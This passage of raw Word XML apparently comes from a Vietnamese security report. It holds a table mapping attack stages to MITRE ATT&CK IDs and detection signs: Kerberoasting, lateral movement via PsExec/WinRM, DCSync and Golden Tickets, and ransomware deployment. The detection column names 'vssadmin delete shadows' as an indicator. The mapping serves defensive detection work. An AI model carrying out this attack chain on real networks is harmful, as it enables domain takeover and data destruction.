              <w:spacing w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1558.003</w:t>
            </w:r>
            <w:r w:rsidR="42B7AEBC" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> T1558.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4012" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1A023D07" w14:textId="0ADF86E8" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:r w:rsidRPr="3FA87A0B">
              <w:lastRenderedPageBreak/>
              <w:t>Kerberoasting và AS-REP roasting; trích ticket, bẻ khóa offline bằng Hashcat.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12407ABA" w14:textId="4426E63D" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>4769 mã hóa RC4 (0x17) hàng loạt; 4768 cho tài khoản không preauth.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="5B74E941" w14:paraId="4635E993" w14:textId="77777777" w:rsidTr="3FA87A0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="13A755E5" w14:textId="6293F4DF" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="519E4BEC" w14:textId="0590A4D4" w:rsidR="4BA8DC1A" w:rsidRDefault="4BA8DC1A" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FFC8939" w14:textId="2F7D53E0" w:rsidR="5B74E941" w:rsidRDefault="23173ADF" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="5B74E941" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Di chuyển ngang</w:t>
            </w:r>
            <w:r w:rsidR="387D6F4E" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BC51D0B" w14:textId="76A3A8F3" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1021.002</w:t>
            </w:r>
            <w:r w:rsidR="099986C7" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> T1021.006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4012" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FF88254" w14:textId="39890F8A" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:r w:rsidRPr="3FA87A0B">
              <w:t>Dùng credential thu được truy cập File/App Server qua WinRM/PsExec/WMI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71328468" w14:textId="06D00A9F" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>4624 logon type 3; dịch vụ từ xa (7045); EDR phát hiện remote exec.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="5B74E941" w14:paraId="76DCE74F" w14:textId="77777777" w:rsidTr="3FA87A0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02ED1A91" w14:textId="66F43CD4" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F577CE8" w14:textId="36E23F17" w:rsidR="2FD8F3B6" w:rsidRDefault="2FD8F3B6" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Domain Compromise</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7424B36D" w14:textId="736CF063" w:rsidR="2FD8F3B6" w:rsidRDefault="2FD8F3B6" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="19B106F7" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Chiếm quyền quản trị miền Active Directory</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A313213" w14:textId="6FF61118" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1003.006</w:t>
            </w:r>
            <w:r w:rsidR="204D7CDC" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> T1558.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4012" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="24F2D3F4" w14:textId="2854376A" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:r w:rsidRPr="3FA87A0B">
              <w:t>Đạt Domain Admin; DCSync dump hash toàn miền (krbtgt) → tạo Golden Ticket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="13B5844F" w14:textId="4363DD8A" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>4662 DS-Replication-Get-Changes từ host không phải DC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="5B74E941" w14:paraId="0D497842" w14:textId="77777777" w:rsidTr="3FA87A0B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="550EBB10" w14:textId="3BE2E867" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="074BE773" w14:textId="46078182" w:rsidR="56F4AB18" w:rsidRDefault="56F4AB18" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Impact and Data Encryption</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C141F98" w14:textId="6E32D914" w:rsidR="56F4AB18" w:rsidRDefault="56F4AB18" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>(Phá hoại hệ thống và mã hóa dữ liệu)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D68687F" w14:textId="7D73C760" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>T1490</w:t>
            </w:r>
            <w:r w:rsidR="40C25B8F" w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> T1486</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4012" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2C31882C" w14:textId="1308F066" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:r w:rsidRPr="3FA87A0B">
              <w:t>Xóa Volume Shadow Copies; phát tán ransomware qua GPO/PsExec; (tùy chọn double extortion).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="23910746" w14:textId="0C3032DB" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="3FA87A0B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="3FA87A0B">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>vssadmin delete shadows; mass file rename; spike I/O; exfil ra ngoài.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78C0FE9A" w14:textId="128EB662" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="5B74E941"/>
    <w:p w14:paraId="4AD35464" w14:textId="18BC53BD" w:rsidR="5B74E941" w:rsidRDefault="5B74E941" w:rsidP="5B74E941"/>
    <w:p w14:paraId="5C8AF318" w14:textId="0315B391" w:rsidR="6D023397" w:rsidRDefault="5C82DF6A" w:rsidP="6D023397">
      <w:r w:rsidRPr="3FA87A0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="6D02339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DD64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EE63FBA"/>
    <w:lvl w:ilvl="0" w:tplc="29DC5292">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0308C18E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="18EECC20">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A512563C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="91E6AEA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DCE83880">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="DCDEF2C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D3E0BEDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9FD8C49E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0C39EBC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3514BCBA"/>
    <w:lvl w:ilvl="0" w:tplc="9BB057A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AB2438F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="15DE2262">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7E8E7018">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E6E2FF5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5974386A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9654BCB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5384751E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7E224D3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1D5ADC16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB4898BA"/>
    <w:lvl w:ilvl="0" w:tplc="82B4DB48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="02188B54">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B7220E7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ADEA7FAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6F66FDB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6E08A16A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F1665F9A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
